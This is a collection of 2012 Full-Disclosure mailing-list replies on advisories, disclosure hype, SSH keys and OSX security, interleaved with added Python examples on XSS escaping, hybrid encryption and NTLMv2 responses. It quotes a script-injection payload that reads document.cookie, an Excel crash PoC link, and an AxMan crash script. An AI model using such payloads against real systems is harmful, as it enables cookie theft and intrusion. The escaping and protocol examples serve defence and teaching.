Re: [Full-disclosure] Apple WGT Dictionnaire 1.3 - Script Code Inject Vulnerability
On Nov 27, 2012, at 5:52 PM, Vulnerability Lab resea...@vulnerability-lab.com wrote:

Proof of Concept:
=
The software validation vulnerability can be exploited by local attackers with required user interaction and privileged local system account. For demonstration or reproduce ...

PoC: Script Code Inject
<h1>VL Tester</h1>"<iframe src=http://vuln-lab.com><iframe src=vuln-lab.com onload=alert("VLab")><script>alert(document.cookie)</script><div style="1">

Solution:
=
The vulnerability can be patched by parsing the search string input field and result output (listing) web context.

Risk:
=
The security risk of the remote command execution vulnerability is estimated as high(+).

Given the required user interaction and privileged local system account and other operational dependencies, by what means did you estimate a high risk? I guess the basic question would be how do you even classify this as a risk in the first place. Do you have some system of calculating risk or is it just a gut feeling type classification?

t

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
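What the advisory's one-line "Solution" (escape the search string on the way into the result listing) looks like in code, as an added example that is not part of the advisory or of the application. The dictionary app's real rendering code is not on the page; render_results_unsafe and render_results_safe below are my hypothetical stand-ins for a result listing that echoes the user's search term into HTML, and PAYLOAD is a constructed input modelled on the PoC quoted above. The third piece, active_content, checks the rendered page with a real HTML parser rather than a substring grep, because the escaped page still contains the text "onload=" inside an attribute value and a grep would wrongly flag it.

```python
"""Added example (not the advisory's or the application's code): context-aware
output escaping for a search-result listing, plus an HTML-aware check that the
escaped output contains no injected markup."""
import html
from html.parser import HTMLParser
from typing import List

# Constructed sample input, modelled on the payload quoted in the advisory.
PAYLOAD = ('<h1>VL Tester</h1>"<iframe src=vuln-lab.com onload=alert("VLab")>'
           '<script>alert(document.cookie)</script>')


def render_results_unsafe(term: str, hits: List[str]) -> str:
    """Vulnerable: untrusted strings are concatenated into the HTML verbatim.
    The " in the payload closes the value attribute and the remainder lands
    in the document as live markup."""
    items = "".join(f"<li>{h}</li>" for h in hits)
    return f'<input name="q" value="{term}"><h2>Results for {term}</h2><ul>{items}</ul>'


def render_results_safe(term: str, hits: List[str]) -> str:
    """Hardened: every untrusted string is escaped for the context it lands in.
    html.escape(quote=True) covers the text context (& < >) and the
    double-quoted attribute context (" and ')."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)
    items = "".join(f"<li>{esc(h)}</li>" for h in hits)
    return f'<input name="q" value="{esc(term)}"><h2>Results for {esc(term)}</h2><ul>{items}</ul>'


class _ActiveContentFinder(HTMLParser):
    """Records script-like tags and on* event-handler attributes as a parser
    sees them, not as a substring search would."""
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(tag)
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def active_content(page: str) -> List[str]:
    """HTML-aware check for injected active content in a rendered page.
    A quoted attribute value that merely contains the text 'onload=' is data,
    not an attribute, so the escaped page comes back clean."""
    finder = _ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("unsafe:", active_content(render_results_unsafe(PAYLOAD, ["vulnerability"])))
    print("safe:  ", active_content(render_results_safe(PAYLOAD, ["vulnerability"])))
```

The unsafe rendering yields an iframe with an onload handler and a script element; the safe rendering yields nothing, and the payload survives only as inert text such as `&lt;script&gt;`. Escaping on output, per context, is the fix; "parsing the input field" alone is not, because the same term may later be rendered into a different context.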
Re: [Full-disclosure] OT Google raises sploit bounties
In fact, Yahoo!'s InfoSec team is called The Paranoids even outside Y!.

t

Sent from whatever device will keep us from debating which one is better.

On Nov 26, 2012, at 2:37 PM, Nick Boyce nick.bo...@gmail.com wrote:

On Sat, Nov 24, 2012 at 3:28 PM, Georgi Guninski gunin...@guninski.com wrote:

http://www.theregister.co.uk/2012/11/23/mystery_chrome_0_day/
... but that was before Google began offering up to $60,000 in bug bounties [...]
Did I miss a major malware related to their warez? Or are they just paranoid?

Of course they're paranoid - it's the only sensible policy. These days a paranoid may be defined as someone who has some idea of what's really going on ~ William Burroughs.

MZ/RS: As far as I know, all reward increases for Google VRPs were driven by a combination of factors 1 through 3. Please stop ridiculing conspiracy theories with reasonable arguments :). No fun.

+1 :)

Nick
--
When there's a shark in the water, you don't have to swim faster than the shark ... just faster than everybody else. ~~ alleged Australian business maxim.
Re: [Full-disclosure] Security risks of doing business with China?
Really? I get nothing for that one??? That shit was FUNNY!!! :)

On Nov 1, 2012, at 10:41 AM, bk cho...@gmail.com wrote:

On Nov 1, 2012, at 1:43 AM, Dan Ballance wrote:

Hi guys, I greatly respect the collective knowledge about security matters on this list. What do you make of this BBC report? Here in the UK we are seemingly happy to do business with China, but other countries are blocking over alleged security concerns. Do you think these concerns are legitimate or is this purely political protectionism? http://www.bbc.co.uk/news/business-20163907

There are two main ways businesses are at risk when dealing with China:

a) Trying to do business _in_ China, the authorities won't let you set up shop directly, but instead force you into a joint venture with an established (and state-supported) Chinese company. In order to make and sell your products, you have to transfer a lot of intellectual property to the joint venture. Guess what happens to that intellectual property? Pretty soon there are multiple Chinese companies making exactly the same thing you make, but selling for a lot cheaper, and maybe not only in their domestic market.

b) Deploying Chinese-built infrastructure components in critical areas of your country. There's a lot of hype about backdoors, but IMO the biggest practical risk is the technical experts they send to do the support. Do people do background checks on the support experts they send in who will have privileged access and debugging capabilities? I doubt it. Maybe they don't even steal any information directly, but simply file reports on how the infrastructure is designed and connected. That information alone has strategic value.

Related to the original article, simply selling a stake as an investment doesn't appear to be all that risky.
It's a question of what access is granted as a part of that investment. Do they get access to board members, to sensitive financial data? If there's no access to non-public data or trade secrets, then there wouldn't appear to be much risk.

Are politicians exploiting China-bashing for votes? Absolutely. Just like any major issue, people are trying to hitch their wagon to it in improbable ways. That doesn't mean there isn't any truth to it. If you're a business going into China, know that their goal will be to replace you with domestic companies within several years. Don't get bullied into stretching past your risk tolerance. They're really good at making it seem like you have a huge opportunity, if only you give in just a little bit more...

--
chort
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
So, if you are a user on a system, you're saying you can run code that attempts to run other code, and though that code doesn't end up running yet more code, that's OK because you're already running code to begin with? Dude, you're going to, like, retire off those ZDI checks!

t

Sent from whatever device will keep us from debating which one is better.

On Oct 29, 2012, at 11:12 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

Thank you Jeff, please tell me this is not exploitable: http://www.exploit-db.com/exploits/22237/

--
All crashes which I gave I know are not that easy to exploit. I just wanted to prove how easy it is to crash MS and I wanted to know MS's opinion about any flaws, so I am not going to give any crashes free as far as I can sell it to ZDI which I know is exploitable or I can exploit it for proof of concept. And I will leave other crashes to exploit dev experts and crash analyzers to exploit and enjoy the flaws. Thank you everyone for sharing.

Best Regards

On Mon, Oct 29, 2012 at 5:47 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

Hello list, Dear Peter and others, please take a look @ it.

Best Regards
Kaveh Ghaemmaghami

Title : Microsoft Office Excel 2010 memory corruption
Version : Microsoft Office professional Plus 2010
Date : 2012-10-27
Vendor: http://office.microsoft.com
Impact: Med/High
Contact : coolkaveh [at] rocketmail.com
Twitter : @coolkaveh
tested: XP SP3 ENG
###
Bug : memory corruption during the handling of the xls files; a context-dependent attacker can execute arbitrary code (need investigate)

(b4c.1350): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0584 ebx=00135070 ecx=1000 edx=105f esi=06a80800 edi=0040
eip=301ce0d0 esp=001302f0 ebp=00131d6c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246
*** ERROR: Symbol file could not be found.
Defaulted to export symbols for Excel.exe -
Excel!Ordinal40+0x1ce0d0:
301ce0d0 668b5008 mov dx,word ptr [eax+8] ds:0023:058c=

Proof of concept included.
http://www36.zippyshare.com/v/48422905/file.html
Re: [Full-disclosure] stealing ssh keys
Actually, the DSA key is used to sign the message in many applications, though I've often wondered exactly what reduction in security exists if the paired private key is used to sign material instead. Do you have any info on that? I've asked industry leaders in crypto, and while they report it should be avoided, I've never received any quantified answer.

And just to make sure people understand (like the guy you replied to), the *message* is not encrypted with the public key - the *key the message is encrypted with* is encrypted with the public key. While you CAN asymmetrically encrypt some data (116 bytes with a 1024 RSA key), it is the symmetric key (e.g. AES) which gets encrypted/decrypted with PKI keys, and the AES key is used to encrypt and decrypt the message itself. I'm sure you knew that, but others obviously don't. :)

Sent from whatever device will keep us from debating which one is better.

On Oct 24, 2012, at 11:51 PM, Ivaylo Hubanov sniff...@gmail.com wrote:

Yes Raj, you almost got the RSA encryption/decryption flow. :) Just the private key is used to sign the data and not to encrypt it. Check this: http://en.wikipedia.org/wiki/Public-key_cryptography

Each user has a pair of cryptographic keys - a public encryption key and a private decryption key. ... The two main uses for public-key cryptography are:
- Public-key encryption: a message encrypted with a recipient's public key cannot be decrypted by anyone except a possessor of the matching private key - it is presumed that this will be the owner of that key and the person associated with the public key used. This is used to attempt to ensure confidentiality.
- Digital signatures: a message signed with a sender's private key can be verified by anyone who has access to the sender's public key, thereby proving that the sender had access to the private key and, therefore, is likely to be the person associated with the public key used.
This also ensures that the message has not been tampered with (on the question of authenticity, see also message digest).

regards,
sniffski
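The hybrid flow Thor describes above (symmetric key wrapped with the public key, the message itself under the symmetric key), as an added example that is not part of the thread. Everything in it is my own construction and standard-library only: textbook RSA over the fixed Mersenne primes 2**521 - 1 and 2**607 - 1 (chosen so the key is deterministic and needs no prime search; a real key uses random primes and OAEP padding, which also lowers the per-block limit), and an HMAC-SHA256 counter-mode keystream with an encrypt-then-MAC tag standing in for AES-GCM, since Python's standard library has no AES. The thing it makes concrete is the size limit: RSA can only encrypt an integer below its modulus, so a 4 KB message is rejected outright while the 32-byte session key fits, and the message rides under that key.

```python
"""Added example: hybrid encryption with standard-library Python only.
Toy RSA (fixed Mersenne primes, no padding) and an HMAC-based stream cipher
standing in for AES; both are demo constructions, not something to deploy."""
import hashlib
import hmac
import secrets

# --- textbook RSA over fixed primes (demo only) ------------------------------
P = 2**521 - 1          # Mersenne primes: deterministic, no prime search needed
Q = 2**607 - 1
E = 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
MODULUS_BYTES = (N.bit_length() + 7) // 8   # 141 for this key


def rsa_encrypt(data: bytes) -> int:
    """Only an integer below N can be encrypted: the plaintext is capped by the
    modulus (minus padding overhead in real RSA). That is why the bulk message
    is never RSA-encrypted directly, only the symmetric key."""
    m = int.from_bytes(data, "big")
    if m >= N:
        raise ValueError(f"{len(data)} bytes do not fit under a {N.bit_length()}-bit modulus")
    return pow(m, E, N)


def rsa_decrypt(c: int, length: int) -> bytes:
    return pow(c, D, N).to_bytes(length, "big")


# --- symmetric part: HMAC-SHA256 counter keystream + encrypt-then-MAC ---------
def _subkeys(key: bytes):
    """Separate encryption and MAC keys derived from the one session key."""
    return (hmac.new(key, b"enc", hashlib.sha256).digest(),
            hmac.new(key, b"mac", hashlib.sha256).digest())


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    out = b""
    for counter in range((length + 31) // 32):
        out += hmac.new(enc_key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
    return out[:length]


def sym_encrypt(key: bytes, plaintext: bytes) -> bytes:
    enc_key, mac_key = _subkeys(key)
    nonce = secrets.token_bytes(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def sym_decrypt(key: bytes, blob: bytes) -> bytes:
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed")       # tampered or wrong key
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct))))


# --- hybrid: RSA wraps the session key, the session key carries the message --
def hybrid_encrypt(message: bytes):
    session_key = secrets.token_bytes(32)       # the "AES key" of the post
    return rsa_encrypt(session_key), sym_encrypt(session_key, message)


def hybrid_decrypt(wrapped_key: int, blob: bytes) -> bytes:
    return sym_decrypt(rsa_decrypt(wrapped_key, 32), blob)


if __name__ == "__main__":
    msg = b"S" * 4096
    try:
        rsa_encrypt(msg)
    except ValueError as err:
        print("direct RSA:", err)
    wrapped, blob = hybrid_encrypt(msg)
    print("hybrid round trip:", hybrid_decrypt(wrapped, blob) == msg)
```

Run as a script it prints the size rejection for the 4 KB message and a successful hybrid round trip. The private exponent D is used only to unwrap the session key; signing with the same key pair, the question Thor raises, is a separate operation and is not shown here.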
Re: [Full-disclosure] stealing ssh keys
I think you're overreacting just a bit. You can give out your private key to whomever/whatever you want to be able to decrypt data encrypted with the public key. It all depends on the use-case, and what you want done. Just because it's a private key doesn't mean it's automatically some critical security component. Many times it is, but it doesn't have to be.

t

Sent from whatever device will keep us from debating which one is better.

On Oct 24, 2012, at 10:59 AM, Jacqui Caren jacqui.ca...@ntlworld.com wrote:

On 23/10/2012 16:07, Daniel Sichel wrote:

Hello everybody: environment is A is hacker client? B is target and C is Manager center and C have all A and B private key.

WTF! Why would anyone C or B or even A give out a PRIVATE key. Does no one RTFM - you never ever give out your private key and you protect it to heck and back.

C are open 80,22. And this is http's 403 state on the C. I have A's root, how to steal private key On the C. Are there have some vuln with openssh. Is there some impossible which C login in to the A and B when A and B let C run some bash.

OK, I am a total n00b here but I do not see how having an ssl connection would help reveal an SSH key. Our organization generates our root certs separate from, and unrelated to SSH keys. I do not see how SSL access in and of itself helps get at SSH keys. If it does, let me know, I bank at Chase and that would be darn handy to know (believe me, they have it coming)!

This is full disclosure not help a student do his homework. My advice: give him a very blatantly stupid answer - let him get null points from teacher :-)

Jacqui
Re: [Full-disclosure] Multiple 0-days in Dark Comet RAT
It's InfoSec. Nothing has any meaning anymore. Or, better stated, things mean whatever people want them to mean in order to forward their agenda. When we talked about full disclosure a while back, somebody said I was jaded as if it meant I had clouded judgement. They were actually right though, as jaded means negative by way of experience. I remember when people started using metrics like moderately critical to describe their [what they called] 0-day XSS vulnerability for some ancient CRM package. That way they get to say they published 14,000 0-days on their marketing material. Some dude recently posted on a professional list how he routinely cracks the NTLMv2 hashes for 10,000 users in 36 hours with rainbow tables. Of course every single part of the statement is complete BS but no one (except me) even blinked. People talk about how stupid users are, but I think the people in the industry are far worse.

Sent from whatever device will keep us from debating which one is better.

On Oct 9, 2012, at 9:59 AM, Philip Whitehouse phi...@whiuk.com wrote:

Does 0-day have any meaning any more? It used to mean there were exploits in the wild used to cause damage before the vendor patched it, not merely that a security researcher found it and disclosed it to the public before the vendor did. If a 0-day is everything found by a security team before a vendor, then the term will lose all purpose and meaning because almost all work done by such researchers is finding vulns. before the vendor. End rant.

Philip Whitehouse

On 8 Oct 2012, at 21:33, Hertz, Jesse jesse_he...@brown.edu wrote:

SQL Injection and Arbitrary File Access present in Command and Control server of DarkComet RAT. For more info see: http://matasano.com/research/PEST-CONTROL.pdf
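Why the "NTLMv2 with rainbow tables" claim Thor dismisses above cannot be right, as an added example that is not part of the thread. The code computes the NTLMv2 response the way MS-NLMP defines it, so the inputs that defeat precomputation are visible: the NT hash is keyed with the upper-cased user name and domain (NTOWFv2), and the proof is keyed again with the server challenge and the client blob, so there is no single password-to-response mapping anyone could tabulate in advance. The user names, password, domain and challenge bytes are constructed for the demo; MD4 is implemented inline because hashlib's md4 is a legacy algorithm that OpenSSL 3 builds often refuse to load.

```python
"""Added example (not from the thread): NTLMv2 response per MS-NLMP, showing the
per-user and per-challenge keying that makes rainbow tables inapplicable."""
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (slow, fine for a demo)."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a = rotl((a + F(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            a = rotl((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. This is the only unsalted value,
    and it never goes on the wire in NTLMv2."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT-hash, UPPER(user) || domain): keyed per account."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def ntlmv2_response(password: str, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int = 0, target_info: bytes = b"") -> bytes:
    """NTProofStr || blob, where NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob).
    The blob carries the client challenge and timestamp, so every exchange differs."""
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, "md5").digest()
    return proof + blob


def verify_ntlmv2(password: str, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """What a server, or a cracker holding one captured exchange, must redo per guess."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, "md5").digest()
    return hmac.compare_digest(proof, expected)


def demo():
    """Constructed users sharing one password: same secret, three different proofs."""
    pw, cc = "Summer2012", bytes.fromhex("aabbccddeeff0011")
    sc1, sc2 = bytes.fromhex("0123456789abcdef"), bytes.fromhex("fedcba9876543210")
    return (ntlmv2_response(pw, "alice", "CORP", sc1, cc),
            ntlmv2_response(pw, "bob", "CORP", sc1, cc),
            ntlmv2_response(pw, "alice", "CORP", sc2, cc))


if __name__ == "__main__":
    for label, r in zip(("alice/sc1", "bob/sc1", "alice/sc2"), demo()):
        print(label, r[:16].hex())
```

Alice and Bob share the password yet produce different NTProofStr values, and Alice produces a different one again under a second server challenge. A captured NTLMv2 exchange can still be brute-forced offline (hashcat mode 5600), but each guess costs two HMAC-MD5 computations bound to that user and that challenge, and nothing is reusable across users or captures; the table that would make 10,000 users cheap cannot exist.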
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86?

T

Sent from whatever device will keep us from debating which one is better.

On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote:

The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.

[1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
[2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on
[3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
[4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/

adobe-flash-install-shit.png
Re: [Full-disclosure] The Dangerous of Fakeroot
Yep, actually had a reply in my drafts. I think he's serious. We've been getting those lately.

t

On Aug 27, 2012, at 2:37 PM, Wiliam Steck codeinject...@gmail.com wrote:

This will only work if the desired user is in sudo and has permissions to execute as root. Otherwise, this post was a huge troll to get traffic to the website this article is hosted on.

[20101:20100 - 0:501] 02:31:36 [nethic@nekobus:/dev/pts/9 +1] ~
$ fakeroot
[20209:20194 - 0:501] 02:31:39 [root@nekobus:/dev/pts/9 +3] ~
$ ls /root
ls: cannot open directory /root: Permission denied
[20209:20194 - 0:502] 02:31:47 [root@nekobus:/dev/pts/9 +3] ~
$ python
Python 2.7.3 (default, Apr 20 2012, 22:39:59)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system("sudo su")
ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored.
[sudo] password for nethic:
Sorry, try again.
[sudo] password for nethic:
Sorry, try again.
[sudo] password for nethic:
Sorry, try again.
sudo: 3 incorrect password attempts
256
>>> os.system("touch /root/test")
touch: cannot touch `/root/test': Permission denied
256

Better luck next time <3 <3 <3
Re: [Full-disclosure] how i stopped worrying and loved the backdoor
Indeed. When I first saw it, I thought someone was coming out of the closet!

t

On Aug 19, 2012, at 4:40 AM, Robert Kim App and Facebook Marketing evdo.hs...@gmail.com wrote:

DakaRand seems to work inside of VMs too. Dan, if you get any new revelations on it, please do make sure you post using a different subject line. This one's getting really congested. Thanks!

--
Robert Q Kim, Trade Show Marketing Strategies
VP Sparkah Destination Event Management
http://www.youtube.com/watch?v=RrXcLCVkFds
2611 S Coast Highway
San Diego, CA 92007
310 598 1606
Re: [Full-disclosure] Tech journalists: Stop hyping unproven security tools
Ah, well that's the problem then. At Lion they dropped all support for Rosetta. But there you have it! Mine is *better*. Now we don't have to debate... Wait. Crap!

Sent from whatever device will keep us from debating which one is better.

On Aug 13, 2012, at 9:55 AM, Stefan Edwards saedwards@gmail.com wrote:

No way did I just google for that; I'm actually working on a rewrite in ObscureLNG/S, and I've been following the progress of the original project closely. Besides, it's not as if that plug is supported anyway; it was written with OS X 10.1 support, and is broken on later versions. The Windows version is terrible (really, Win32 in today's world?) and the Linux version is downloadable only from the vendor's .vn subsidiary.

On Mon, Aug 13, 2012 at 12:49 PM, Thor t...@hammerofgod.com wrote:

What, you just Google for that?? You've clearly not tried that fix or you'd know how hard it is to solder that thing. Well, unless you've got really expensive equipment. And what do you do if you are out and it breaks? I'll stick with mine, thank you!!

t

On Aug 13, 2012, at 9:39 AM, Stefan Edwards wrote:

That is totally untrue. There is a partially-working and unmaintained project on github that totally allows you to skip the plug, if you're willing to just put in a bit of time to set up the entire suite of tools necessary to run this one project.

On Mon, Aug 13, 2012 at 12:35 PM, Thor t...@hammerofgod.com wrote:

Hell yeah I am. It's the only thing I could find that would sync up to that other thing, unless you buy the thing that plugs into the other thing!

On Aug 13, 2012, at 9:00 AM, Lincoln Anderson wrote:

Sent from whatever device will keep us from debating which one is better.

You're seriously using that thing? I've found its restricted [vendor term for application library] is a huge detriment to an already ailing product.
You should probably just switch to the more popular Whichever Platform Prevents Argumentation Over Superiority (admittedly less popular, but gaining ground and a true forum fanboi's dream!).

--
Q. How many Prolog programmers does it take to change a lightbulb?
A. No.
Re: [Full-disclosure] Tech journalists: Stop hyping unproven security tools
The first and most obvious point is that they are NOT journalists. They are monkey read, monkey write content pushers with no regard for truth, accuracy, or fairness. Look at what's happened with the Apple thing. One monkey reads what another monkey wrote, figures it's true, and writes his own version, mixing things 'round a bit. Now when you read something it sounds like the whole of cloud computing is at risk. It's all crap. They do whatever they can to get you to their site so you are forced to watch a 30 second commercial (which is moronic, btw).

T

Sent from whatever device will keep us from debating which one is better.

On Aug 12, 2012, at 7:57 PM, Ivan .Heca ivan...@gmail.com wrote:

Cui bono
http://paranoia.dubfire.net/2012/07/tech-journalists-stop-hyping-unproven.html?utm_source=Contextlyutm_medium=RelatedLinksutm_campaign=AroundWeb

ouch
http://blog.alexanderhiggins.com/2012/08/10/experts-idiots-war-security-165251/
Re: [Full-disclosure] AxMan ActiveX fuzzing == Memory Corruption PoC
Actually, you did ask him to read it. You asked everyone to read it by posting it. That's the way this works. If you can't handle criticism for moronic advisories, then *you* are the one who needs to keep it to yourself.

T

Sent from whatever device will keep us from debating which one is better.

On Jul 29, 2012, at 3:08 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

I think ur on vacation now aren't u. Plus nobody asked u to read my post and I am not interested about ur opinion, keep it for yourself.

On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

Exploit Title: AxMan ActiveX fuzzing == Memory Corruption PoC
Crash : http://imageshack.us/f/217/axman.jpg/
Date: July 28, 2012
Author: coolkaveh coolka...@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://digitaloffense.net/tools/axman/
version : 1.0.0
Tested on: windows 7 SP1

Crash The Exploiter
Lame HD Moore fuzzer Memory Corruption
By Awsome coolkaveh
---
import os
import win32api

crash = "Crash The Exploiter"
lame = "Lame HD Moore fuzzer Memory corruption"
awsome = "By Awsome coolkaveh"
print
print
print
print crash
print
print lame
print
print awsome
print
print
print
print
# 800 NOP bytes passed as the command-line argument to axman.exe
exploit = ("\x90" * 800)
win32api.WinExec((r'D:\axman-1.0.0\bin\axman.exe %s') % exploit, 1)
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Right - if you've compromised the server to the point you can alter directory structures/names, then you've already bypassed the ACLs required in order to exploit the vulnerability that allows you to bypass the ACLs. I don't get it.

t

On 7/16/12 10:47 AM, Григорий Братислава musntl...@gmail.com wrote:

On Mon, Jul 16, 2012 at 1:24 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:

Hi Lists, it seems Microsoft doesn't want to patch the vulnerabilities I posted back in June, at least not in the July update.

Hello Full Disclosure!! !! !!

Is like to introduce you to Schrödinger's Cat and Wigner's Friend in is Computer Security.

'The Wigner's Friend thought experiment posits a friend of Wigner who performs the Schrödinger's cat experiment after Wigner leaves the laboratory. Only when he returns does Wigner learn the result of the experiment from his friend, that is, whether the cat is alive or dead. The question is raised: was the state of the system a superposition of dead cat/sad friend and live cat/happy friend, only determined when Wigner learned the result of the experiment, or was it determined at some previous point?'

http://en.wikipedia.org/wiki/Wigner's_friend
http://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat

IIS is neither vulnerable or not vulnerable. Is until you is exploit it and verify!
Re: [Full-disclosure] has Thor big ego, has Thor long boring messages
Sure, no problem. Heaven forbid we talk about something like full disclosure on the, um, Full Disclosure list. What was I thinking? Thanks for coming out of hiding, as per your official letter to FD telling us you were leaving, just to set me straight.

T

From: NETT Dave nett.d...@yahoo.com
Reply-To: NETT Dave nett.d...@yahoo.com
Date: Tuesday, July 10, 2012 11:38 PM
To: full-disclosure@lists.grok.org.uk
Cc: Timothy Mullen t...@hammerofgod.com
Subject: has Thor big ego, has Thor long boring messages

Thor, u're has always has given lessons too others in long so boring messages. Big ego, has not that smart after all. Please has us let peace: has you shut up.
Re: [Full-disclosure] Preferred OSX Security/Server Lists
Same here… I couldn't find anything that really served my needs. It was hard enough to find the right resource to enable a single user to have multiple email addresses for OSX Lion Server Mail – but I figured that out. Maybe we should start one then? I'm moving the HoG website over as well and I'll be including the Wiki stuff, so I'll have the resources to host something like that.

Regarding the actual reason for moving, there are several, but I'll focus on the most important. I'm a big music and media person, and I like to be able to have my music accessible when and where I want it and have options for redirection of equipment. Setting up Windows Media Center was a pain, and it was slow and very limited in features. And there were issues with Zune files working or not working, the general requirement for network configuration, and just a lot of complexity. With OSX I just run it, tell iTunes to share my library, and then I can play whatever I want on my iPad or iPhone. Then I just plugged in the AppleTV to my main entertainment system, and then I could remotely play stuff on my iPhone directly to that stereo. I have speakers run outside, so I can literally be in the backyard and tell my iPhone "Play Robert Plant" and it plays from my phone to the Apple TV and out the speakers. SUPER smooth.

So after that I started digging in to OSX more and have liked it more and more as I go. Having the same features with such a dramatically less complex installation is really a huge benefit to me. iCal, iChat, Mail, and iContact servers are amazingly simple and do exactly what I need – compared to Exchange and PS, and all that stuff, well… :)

Of course my main concern (and reason for posting) is that I want to make sure I do my due diligence and learn what I need to learn in order to properly secure the services I put out on the Internet. For instance, I can set up IIS to be tremendously secure in my sleep as I've done it for years. However, I don't know what to do with Apache.
I just don't know it. So I want to find out about principal accounts, service contexts, virtual directories, server-side applications, etc etc. HoG has never been hacked (to my knowledge) but I'm totally expecting to be pwned now that I'm basically doing a 180 in my production environment.

I think starting an actual Mac security list would be a good idea. Hell, maybe I can sell enough Thor's Microsoft Security Bible copies to help buy more Mac equipment :) LOL.

t

From: phocean 0...@phocean.net
Date: Wednesday, July 11, 2012 12:32 PM
To: Timothy Mullen t...@hammerofgod.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Preferred OSX Security/Server Lists

Hi, I do not know any specific stuff yet, though I have been a recent switcher myself. I had a quick look but it seems that there are not many resources. So this is going to be an interesting topic. Just curious: what are the motives for your switch?

Regards,
---
phocean

On 9 Jul 2012, at 19:45, Thor (Hammer of God) wrote:

Greets all. I was hoping to get some opinions on your favorite OSX security/server admin sites/lists. I'm converting the HoG internal and production networks over to OSX and OSX Server and would like some pre-vetting suggestions for a decent source of information. Thanks much.

t
